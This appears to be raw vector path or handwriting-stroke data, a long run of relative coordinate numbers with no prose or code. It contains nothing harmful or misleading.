0,0 0 0,-1 0 0,1 0 0,-4 5 1,2-3 15,0 0 0,0 0 0,-1-1 0,0 0 1,0 0-1,-1 0 0,1 0 0,-1-1 0,0 0 1,0 0-1,-1 0 0,1 0 0,-1-1 0,0 0 1,-7 3-1,-11 3-195,-1-1 0,-41 8 0,13-3-1796,48-13 2591,-10 1-13252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55 152 944,'0'0'3518,"42"18"1509,-2-9-2774,-38-8-2140,1 0-1,-1 0 1,1 0 0,-1-1 0,1 1-1,-1 0 1,1-1 0,-1 0 0,1 0-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1-1-1,-1 1 1,1-1 0,-1 1 0,1-1-1,-1 0 1,0 0 0,4-3 0,3 0-32,-1 0 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0-1 0,-1 1 0,8-10 0,-13 14-43,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 1,0-1-1,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,-1-4 0,-11-14 807,12 17-796,1 0 0,-1 1 1,0-1-1,0 0 0,0 1 1,-1-1-1,1 1 1,0-1-1,0 1 0,-1-1 1,1 1-1,-1 0 0,1 0 1,-1 0-1,0 0 0,0 0 1,1 0-1,-1 0 1,0 0-1,-3 0 0,-12-3 360,0 0-1,0 2 1,0 0 0,-23 1-1,32 1-359,1 1-1,-1 0 0,0 1 1,1 0-1,0 0 1,-1 1-1,-6 3 0,11-6-41,1 1 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0-1,1 0 1,-1 0 0,1 1 0,0-1 0,0 0 0,-1 0 0,1 1 0,1-1 0,-2 3 0,-9 39 58,11-32-63,0-4 4,-1-1 1,2 0 0,-1 0-1,1 1 1,2 10-1,-2-17-7,-1 1-1,0-1 1,1 0-1,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,1 0-1,-1-1 1,0 1-1,0 0 0,1-1 1,-1 1-1,0-1 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 0 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 0,3-1 1,9-2-4,-1 2 1,-1-1 0,1 0 0,0-1 1,-1-1-1,1 0 0,-1 0 0,0-1 0,12-8 1,12-4 19,-31 16-10,0 0 1,-1 0 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,4-4 0,12-4 38,-18 10-41,-1 0 1,1 0-1,-1 0 1,1-1-1,-1 1 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 1 1,-1-1-1,0 0 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,1 0-1,-1 1 1,0-1-1,0 1 1,1-1-1,-1 0 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,1 0-1,-1 1 1,0-1-1,0 1 1,0 0-1,12 9 30,-11-9-54,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,1 1 1,-1 0-309,1 0 1,-1 0 0,1 0-1,0 0 1,0-1 0,0 1-1,0-1 1,0 1 0,0-1-1,1 0 1,-1 0 0,5 3 0,15 8-8085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13 396,'0'0'1693,"1"-12"6125,1 12-7515,0 1 0,0-1 0,0 0 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 1,1 0-1,-1 1 0,0-1 0,0 0 0,2 3 0,-1 0-80,0 0 0,0 1 0,1-2 0,-1 1 0,1 0 0,0 0 0,5 3 0,12 19 194,-17-22-411,1-1 1,0 1 0,0 0 0,0-1 0,0 0-1,1 0 1,-1 0 0,1-1 0,8 4 0,-7-3-82,3-5-10,-2-2 47,-1 1-78,-1 0 0,1 0 0,-1-1 1,0 0-1,0 0 0,8-8 1,28-31-392,-30 32 622,-10 15 34,-17 30 220,-2 1 58,9-12-141,-2-1 1,-18 29-1,-6 11 190,-28 75-102,54-109-547,6-17-2050,2-24-3534,7-1 1431,-3 9 2910,-1-7-1657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7 68,'0'-7'12284,"-20"27"-10030,-46 107 736,60-115-2851,1 0 0,0 0 0,1 0 0,1 1 1,0 0-1,0 0 0,1-1 0,1 2 1,0 18-1,3-21-121,-1 1 1,2-1 0,-1 0-1,1-1 1,1 1-1,0 0 1,0-1 0,8 11-1,-10-17-64,0-1 0,1 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,0-1 1,0 1-1,0-1 0,1 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,0-1 0,0 0 0,0 0 1,0 0-1,6 1 0,-8-2-591,1-1-35,0 1 1,-1-1-1,1 1 0,-1-1 0,1 0 0,-1 0 1,1 0-1,-1-1 0,5-2 0,-6 4-113,10-14-4203,-10 3 2205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91 728,'1'2'302,"-1"0"1,0 0-1,0 0 1,1 0-1,-1 0 0,1 0 1,0 0-1,0-1 1,-1 1-1,1 0 0,0 0 1,1-1-1,0 3 1,25 17 526,-25-20-839,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0-1-1,1 0 1,-1 0-1,0 1 0,0-1 1,0 0-1,0-1 0,1 1 1,-1 0-1,0-1 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 0,0-1 1,0 1-1,-1 0 0,3-2 1,15-14 15,5-8 63,-15 12 90,-8 11-21,1 0 1,-1 0 0,0-1 0,0 1 0,0 0-1,0-1 1,0 1 0,0-1 0,-1 1-1,1-1 1,-1 1 0,1-1 0,-1 0-1,0 1 1,0-1 0,-1-2 0,1 3 8,-1 0-1,1 0 1,-1 1 0,0-1 0,0 0 0,0 1-1,1-1 1,-2 0 0,1 1 0,0-1 0,0 1 0,0 0-1,-1-1 1,1 1 0,0 0 0,-1 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0 0,0 1-1,1-1 1,-1 1 0,0-1 0,0 1 0,0 0 0,1-1-1,-1 1 1,0 0 0,0 0 0,-2 1 0,-1-2-29,1 1 1,-1 0 0,1 0 0,-1 0 0,1 1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,-1 1 0,1 0 0,0 0 0,0 0 0,-5 3 0,-9 9-674,11-8 593,0-1 1,0 2 0,0-1 0,1 1 0,-6 7 0,3 4-3217,6 2-3569,3-15 4001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92 900,'-2'1'131,"1"-1"1,-1 1-1,0 0 0,0 0 1,1 0-1,-1 0 0,1 0 0,-1 0 1,1 1-1,-1-1 0,1 1 1,0-1-1,-1 0 0,1 1 1,0 0-1,0-1 0,0 1 0,0 0 1,1-1-1,-1 1 0,0 0 1,1 0-1,-1 0 0,1 0 0,0 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,1 0 0,-1 0 1,0 0-1,0 0 0,1 0 0,-1 0 1,1 0-1,0-1 0,0 1 1,-1 0-1,3 2 0,1 8 62,-4-12-190,0 1 1,0-1 0,0 1-1,0-1 1,0 1-1,1-1 1,-1 1 0,0-1-1,0 1 1,0-1 0,0 1-1,1-1 1,-1 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,1-1 0,-1 0-1,0 1 1,1-1-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 1 0,1-1-1,19 13 100,-19-12-82,1 1 0,0-1 0,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,0 0 0,1 0-1,-1-1 1,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,0-1 0,1 1 0,2-2 0,1 0 44,0-1-1,1 0 1,-1-1 0,-1 1 0,1-1 0,0-1 0,-1 1 0,0-1 0,0 1 0,0-2 0,-1 1-1,8-11 1,5-6 491,-15 19-331,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0-7 0,-1 5-66,0 4-92,0 0 1,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0-1 1,0 1-1,0 1 1,-1-1 0,1 0-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,0-1-1,0 0 1,1 0-1,-2 0 1,-11-24 2161,11 23-2135,0 0-1,-1 0 1,1 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,-1 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 1-1,0 0 1,-5-1-1,2 1-28,2 0 7,-1 0 1,1 0-1,-1 0 0,1 1 1,0-1-1,-1 1 0,1 0 1,0 0-1,0 1 0,-1-1 0,1 1 1,-4 2-1,4-2-8,-25 17 262,27-18-317,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,1-1 0,-1 1 1,1 0-1,-1 2 0,-10 26-31,11-28 23,0-1-1,1 1 0,-1-1 0,1 1 0,-1-1 1,1 0-1,0 1 0,-1-1 0,1 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 0,0 0 0,0 0 1,1-1-1,-1 1 0,1 0 0,-1-1 0,1 1 1,-1-1-1,0 0 0,1 1 0,-1-1 0,1 0 1,0 0-1,-1 0 0,1 0 0,-1 0 0,1 0 1,1-1-1,68-7 22,-65 6-32,-3 1 11,1 0-1,-1 1 0,0-1 1,0 1-1,1-1 0,-1 1 0,0 0 1,1 0-1,-1 0 0,6 2 1,1-1-21,-6 0 5,0-1-1,0 1 1,-1 0-1,1 0 0,0 1 1,-1-1-1,1 1 1,-1 0-1,4 2 1,-3-2 59,-1 0 0,1 0-1,0 0 1,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,6 1 0,-9-2-77,1 1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,1 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41 204,'0'-1'2559,"0"2"-1685,0-7 1743,1 7-2491,-1-1 1,0 0 0,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 0 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1 0,-1 0-1,1 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0 0,0 0-1,0 1 1,-1-1-1,1 0 1,0 0-1,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,-1 1-1,1-1 1,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,0-1-1,-13 15 831,-16 16-580,21-19-210,5 6 128,3-16-262,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,0-1-1,0 0 1,0 0 0,0 1 0,0-1 0,0 2 0,8 40 406,-2-10-376,-6-31-62,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0-1,-1 1 1,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,2 1 0,0-1 8,-1 0-1,1-1 1,0 1-1,-1-1 1,1 1-1,-1-1 1,1 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,2-1 0,7-2 63,-1 0 1,0 0 0,0-2 0,0 1-1,12-8 1,-18 10-61,0-1 1,0 0-1,0-1 0,-1 1 1,0-1-1,1 0 0,-1 0 0,0 0 1,-1 0-1,1-1 0,-1 1 0,0-1 1,0 0-1,0 0 0,-1-1 1,1 1-1,-1 0 0,-1-1 0,1 1 1,-1-1-1,0 0 0,0 1 0,-1-1 1,1 0-1,-1 1 0,-1-1 1,1 0-1,-1 0 0,0 1 0,0-1 1,-1 1-1,1-1 0,-5-8 1,4 10 31,0 0 1,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0-1,0 0 1,0 0 0,0 1 0,-1-1 0,1 1 0,-1 0-1,0 0 1,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 0-1,-7-1 1,5 1-25,-1 0 0,1 1-1,-1 0 1,1 0 0,-1 0-1,1 1 1,-1 0 0,1 0-1,0 0 1,-1 1 0,1 0-1,-10 5 1,-3 3-26,15-8-54,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,1 0 0,-1 0 1,-3 5-1,-19 15-1837,12-12-1274,0 3-5617,5-8 5656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3 180,'0'0'106,"0"-1"-1,0 1 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,-1 0 0,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,0-1-1,0 1 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 0-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0 0,-1 1-1,1-1 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 1-1,0-1 1,0 0 0,-1 0-1,1 1 1,-12 4 2663,-1 24 259,24 2 773,0-1-2901,-10-26-830,0 0 0,1 0 0,-1-1 0,1 1 1,0 0-1,0-1 0,1 1 0,3 4 0,8 15 314,-8-15-268,0-1 0,0 0 0,1-1 0,0 0 0,13 10 0,0 0 86,29 17 235,-42-30-394,0 1 0,-1 0 0,0 0-1,0 0 1,0 1 0,6 6-1,-1 0-13,2 0 0,-1-1 0,18 11 0,11 10-14,12 6-160,-36-27-1007,-16-10 668,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,2-1 0,-1-9-2992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28 509 564,'-11'7'4311,"9"1"-4953,-12-12 10709,20 6-6031,-7-4-3957,1 1 1,0 0 0,-1 0 0,1-1-1,0 1 1,0 0 0,0 0 0,0-1-1,0 1 1,1 0 0,-1 0-1,0-1 1,0 1 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1-1 0,0 1-1,-1 0 1,1 0 0,0 0-1,1-1 1,1-5 76,-2 4-152,-1 0-1,1 0 1,-1 0-1,1 0 1,0 0-1,0 1 1,0-1-1,1 0 1,-1 0 0,1 1-1,-1-1 1,1 1-1,0-1 1,0 1-1,0 0 1,3-3-1,1-1 21,17-26 87,20-13 185,-36 36-280,1 0 1,0 0 0,1 1 0,0 0 0,0 0-1,17-10 1,60-36-27,65-43 91,-112 72-39,-30 17-22,1 2 0,1-1 0,-1 2 0,1-1 0,17-5 0,5-7-1,-9 7-18,-20 9 1,-1 1-1,0-1 1,1 0-1,-1 1 1,1 0 0,0 0-1,-1 0 1,1 0-1,4 1 1,100-13 47,161 1-149,-163 24 236,-86-10-58,0 1 1,0 0-1,0 2 1,-1 0-1,25 10 1,9 2-136,6-2 87,53 17 59,-95-25-61,14 4 134,39 21 1,-5 20-83,-63-50-73,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0 3-1,30 24 24,-28-26-13,0 0-1,1 0 1,0 0-1,0 0 1,0-1-1,6 5 1,12 11 140,-20-17-131,1 1 2,0-1 0,-1 1 0,1 0 1,0 1-1,-1-1 0,0 0 0,0 1 1,0 0-1,0-1 0,0 1 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 7 0,-1-11-22,-1 1-1,1-1 1,-1 0-1,1 1 1,0-1-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,0-1 1,1 1-1,-1 0 0,0-1 1,1 1-1,-1 0 1,0-1-1,0 1 1,0 0-1,1 0 0,-1 1 4,0-2-3,-1 0-1,1 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 0 1,0 0-1,1 1 0,-1-1 0,0 0 1,0 1-1,1-1 0,-1 0 1,0 0-1,0 1 0,1-1 0,-1 0 1,0 0-1,1 0 0,-1 0 1,0 1-1,0-1 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1-1 0,0 0-210,0 1 139,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,0-1-1,-1 1 1,1 0-1,0-1 1,-1 1-1,1 0 1,0-1-1,-1 1 1,1 0 0,0-1-1,-1 1 1,1 0-1,0 0 1,-1-1-1,1 1 1,-1 0-1,1 0 1,-1 0-1,1 0 1,0-1-1,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,0 0-1,-22-8-6540,5-1-808,7 8 3549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1 283 936,'0'-1'278,"0"0"0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,1-2 139,-1 0 401,-1 2-636,0-1-1,-1 0 0,1 1 1,0-1-1,0 0 1,0 1-1,0-1 0,0 1 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 1 1,1-1-1,34 8 1595,12 7-1255,-33-10-418,1 0 0,0 0 0,0-2 1,1 0-1,27 2 0,6-3 50,-31-1-68,0 0 0,33-4 0,21-3 44,-59 6 4,0 0 0,0-1 0,0-1 0,0 0 0,0-1 0,0-1 0,-1 0 0,1-1 0,13-6 0,-20 6-40,-1 0 1,1-1 0,-1 1-1,0-1 1,-1 0-1,0-1 1,0 1 0,0-1-1,0 0 1,-1 0 0,-1-1-1,1 1 1,-1-1-1,3-11 1,0-5 109,-5 21-193,0 1-1,0 0 1,0-1 0,-1 1-1,1 0 1,-1-1-1,1 1 1,-1-1-1,0 1 1,0-1 0,0 1-1,0-1 1,-1 1-1,1-1 1,-2-3 0,-4-22 32,5 24-47,1 1 0,-1-1 0,1 0 0,-1 0-1,0 0 1,-1 1 0,1-1 0,-1 0 0,1 1-1,-1-1 1,0 1 0,0 0 0,-5-5 0,7 8-24,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 0,0 0 1,-1-1-1,1 1 1,0 0-1,-1 0 1,1 0-1,0-1 1,-1 1-1,1 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1-1-1,0 1 0,-1 0 1,1 0-1,-1 1 1,1-1-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,0 0 1,-1 1-1,1-1 0,-1 1 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1875 0 4,'0'0'2246,"9"6"2859,-9-6-5014,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,0-1 0,-1 1-1,1 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 1-1,0-1 1,-1 0 0,1 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 1 1,-1-1-1,1 0 1,0 0 0,0 0-1,0 0 1,-1 1 0,1-1-1,0 0 1,0 0 0,0 0-1,0 1 1,0-1 0,0 0-1,-1 0 1,1 1 0,0-1-1,0 0 1,0 0 0,0 1-1,0-1 1,0 0 0,0 1-3,0 0 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,0 1 1,-1-1-1,1 1 1,0-1-1,-1 1 0,1-1 1,0 0-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 0-1,1 0 1,0 1-1,-1-1 0,1 0 1,-2 1-1,-10 24 1556,10-21-1558,0-1-1,0 1 1,0-1-1,0 0 1,0 0-1,-1 0 1,0 0-1,1 0 1,-1 0-1,-5 3 1,-37 29 320,38-30-243,-1 0 1,1 0-1,0 1 1,-13 13-1,-6 6 69,-93 66 856,92-69-688,-2-2 0,-53 29 0,78-47-367,-18 13 187,18-12-127,-1 0-1,0 1 1,0-2 0,0 1 0,-11 4 0,0-3-51,0 2 1,1 0-1,-25 13 1,-44 30 572,68-39-563,10-6-43,-1 1 1,0-2-1,0 1 1,0-1 0,0 0-1,0 0 1,-1-1-1,-10 3 1,0 2 22,15-5-31,1-1-1,-1 0 1,0 1 0,1-1 0,-1 0-1,0-1 1,0 1 0,1 0 0,-1-1-1,-4 1 1,-58 22-26,45-16 64,12-4-13,0-1 0,0 0 0,0 0 0,-15 1 0,-72 16 531,93-19-503,-32-1 43,26-2-88,0 1 0,0 1 1,-1-1-1,1 2 0,0-1 0,0 1 0,-1 0 1,-12 2-1,-9 0 205,27-3-154,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,0-1 1,0 1-1,0 0 0,-3-3 0,3 3-26,-1-1-1,1 0 1,-1 0-1,1 1 1,-1 0-1,0 0 1,0 0-1,0 0 1,-5 0-1,-4-1-20,0-1-1,0-1 1,1 0-1,-14-7 1,25 11-12,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 1,1-1-1,-1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-2 0 0,0-1 4,-7-5 0,1 0-1,-1 0 0,0 1 1,-1 0-1,1 1 0,-13-4 1,-62-12-117,82 20 86,2 0 31,0-1 1,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1-1,1 0 1,0-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-17-6 75,12 3-86,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1 1 0,0-1 0,1 1 0,-12-1 0,15 1 1,-6-3 7,-11-1-1,19 5-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 1,0 1-1,0 0 0,0-1 0,1 1 0,-1-1 0,0 0 0,0 1 0,1-1 0,-1 1 1,0-1-1,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1-1 0,-23-11 522,23 13-516,-1 0 0,0 0 0,0-1 1,1 1-1,-1 0 0,0 0 0,1-1 1,-1 1-1,1-1 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,1 0 1,-2-1-1,-8-6 208,5-1 146,6 8-359,1 1 1,-1 0 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,-1 0 1,1 0 0,0-1 0,0 1-1,0 0 1,0 0 0,0 0-1,0 0 1,0-1 0,0 1-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,0 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 1-1,0-1 1,0 0 0,0 0 0,-1 0-1,1 0 1,0-10 100,-7 5-75,7 5-35,-1-1 1,1 1-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 1,-1-1-1,1 1 1,0 0 0,-1-1-1,1 1 1,-1 0-1,1-1 1,-1 1-1,1 0 1,0 0-1,-1-1 1,1 1-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 1,0 2-345,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,-2 1 0,-37 24-9590,32-21 7775,-4 2-1658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5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2 378 568,'0'7'11576,"0"-8"-10713,0 1-795,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 1,0 0-1,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 1,-1-1-1,0 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,1-1 641,-9-4-464,6 2-117,0-1 0,0 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,2-6 0,-2-2 9,11-45-25,-1-5 486,-10-23 606,20 67-620,-7-14-92,-13 31-489,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 1,1-1-1,-1 1 1,0-1-1,0 1 1,1-1-1,-1 1 1,0 0-1,0-1 1,1 1-1,-1 0 1,1-1-1,-1 1 1,0 0-1,1-1 1,5-10 393,-6 10-56,-2-28 1034,-4 27-847,15 10-200,0-6-300,-1 0 0,0 0 0,1 0 0,-1-1-1,1-1 1,0 0 0,-1 0 0,1 0-1,-1-1 1,17-3 0,25-1 15,-9 3 33,-1-2 1,56-12-1,-88 14-90,48 0-126,-55 2-31,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,0 1 0,-1-1-1,0 1 1,1-1-1,-1 1 1,1-1 0,-1 1-1,1 0 1,-1 0-1,0-1 1,0 1 0,1 0-1,-1 0 1,0 0-1,0 0 1,0 1 0,0-1-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 0-1,0 4 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1 516,'0'0'992,"-31"35"2399,21-5-2623,-3 3-191,-19 50 1184,28-78-1539,2 0 0,-1 1 1,0-1-1,1 1 0,0 0 1,0 0-1,0 6 0,-9 22 1132,10-28-1066,0 0-1,0 0 1,0 0-1,1 0 1,-1-1 0,2 1-1,0 11 1,0 4 382,0-18-611,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0 0,1-1 0,-1 1 0,0 0-1,1-1 1,-1 1 0,1-1 0,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,1 0 0,-1 0 0,1 0-1,-1-1 1,1 0 0,-1 1 0,1-1 0,0 0 0,0 0-1,0 0 1,0-1 0,0 1 0,0-1 0,3 1 0,7 1 66,0-1 1,0 0-1,0 0 1,0-2-1,1 1 1,15-4 0,-3-1-725,52-3 1,-76 8-404,-24-7-9516,11 2 7709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44,'22'-19'6814,"-22"8"-6203,1 11-537,-1 0-1,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 0,0 1 1,0 0-1,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,0 0-1,0 0 0,0 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,0 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,0 1-1,0-1 1,0 0-1,-1 0 0,-5 0 498,8 37 2687,0-33-3173,-1 0-1,0 1 0,0-1 1,0 0-1,0 0 0,0 0 1,-1 1-1,0-1 1,0 6-1,-1-7-62,1 0 1,0 1-1,0-1 1,0 0-1,1 1 1,-1-1-1,1 0 1,0 0-1,0 1 0,0-1 1,0 0-1,0 0 1,3 3-1,7 37 203,-11-43-224,1 1 0,-1 0 1,1-1-1,-1 1 0,1 0 0,-1-1 1,0 1-1,1 0 0,-1 0 0,0-1 1,0 1-1,0 0 0,1 0 0,-1-1 1,0 1-1,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,-1 1 0,1-1-1,0-1 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1 0,0-1-1,1 1 1,-1-1 0,0 0 0,0 1-1,1-1 1,-1 1 0,0-1 0,0 0-1,1 1 1,-1-1 0,1 